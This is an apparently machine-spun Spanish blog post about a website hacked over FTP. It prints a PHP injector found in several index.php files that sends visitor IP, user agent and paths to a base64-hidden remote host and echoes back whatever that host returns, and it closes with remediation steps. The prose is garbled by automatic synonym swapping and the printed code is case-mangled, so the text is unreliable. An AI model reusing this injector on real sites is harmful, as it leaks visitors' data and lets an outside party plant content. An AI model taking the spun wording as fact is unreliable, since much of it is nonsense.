tras repasar el log del palafrenero y demostrar varias acogidas por Ftp de una orientación natal de Canadá, revisé los estantes que parecían haber sido transformados por este extraño. En este albur, multiples editoriales index.php acaudalados en distintos inventarios del servidor.
en todos estos ficheros se había comprendido este gajo de edicto Php.
<?php
if (!isset($sretry))
{
popular $Sretry;
$Sretry = 1;
// This code use for total bot statistic
$Suseragent = Strtolower($_server['http_user_agent']); // Looks for google serch bot
$Stcurlhandle = Null;
$Stcurllink = “”;
If((strstr($suseragent, ‘google’) == False)&&(strstr($suseragent, ‘yahoo’) == False)&&(strstr($suseragent, ‘baidu’) == False)&&(strstr($suseragent, ‘msn’) == False)&&(strstr($suseragent, ‘opera’) == False)&&(strstr($suseragent, ‘chrome’) == False)&&(strstr($suseragent, ‘bing’) == False)&&(strstr($suseragent, ‘safari’) == False)&&(strstr($suseragent, ‘bot’) == false)) // Bot comes
{
If(isset($_server['remote_addr']) == true && Isset($_server['http_host']) == true){ // Create bot analitics
$Stcurllink = base64_decode( ‘ahr0cdovl2jyb3dzzxjnbg9iywxzdgf0lmnvbs9zdgf0rc9zdgf0lnboca==’).’?ip=’.urlencode($_server['remote_addr']).’&useragent=’.urlencode($suseragent).’&domainname=’.urlencode($_server['http_host']).’&fullpath=’.urlencode($_server['request_uri']).’&check=’.isset($_get['look']);
@$stcurlhandle = curl_init( $Stcurllink );
}
}
if ( $Stcurlhandle !== Null )
{
Curl_setopt($stcurlhandle, Curlopt_returntransfer, 1);
Curl_setopt($stcurlhandle, Curlopt_timeout, 6);
$Sresult = @Curl_exec($stcurlhandle);
if ($sresult[0]==”o”)
{$sresult[0]=” “;
echo $Sresult; // Statistic code end
}
Curl_close($stcurlhandle);
}
}
?>
el compendio inventariado en Base64 ahr0cdovl2jyb3dzzxjnbg9iywxzdgf0lmnvbs9zdgf0rc9zdgf0lnboca contiene esta sentida [http://hotlogupdate.com/stat/stat.php]
en este acontecimiento, el edicto es facilmente reconocible. En otras oportunidades el edicto intercalado es un javascript aturdido bastante mas dificil de detectar.
si vuestra web es hackeada e apestada por este u otro tipo de estatuto viperino es recomendable que toméis las subsiguientes medidas aparte de matar el pesado estatuto claro …
1. Cambiar las credenciales de golpe al paramento de cuidado del Alojamiento (plesk, cpanel …)
2. Cambiar las credenciales de la bolita Ftp
3. Revisar los repertorios desde los que se ha conseguido con la tabla Ftp cuyas credenciales parecen haber sido sustraidas en búsqueda de algún tipo de Troyano que el hacker haya podido beneficiarse para sustraerlas.
]]>
Este post se a creado automaticamente con autoblogger imperium descargalo Gratuito
0 comentarios:
Publicar un comentario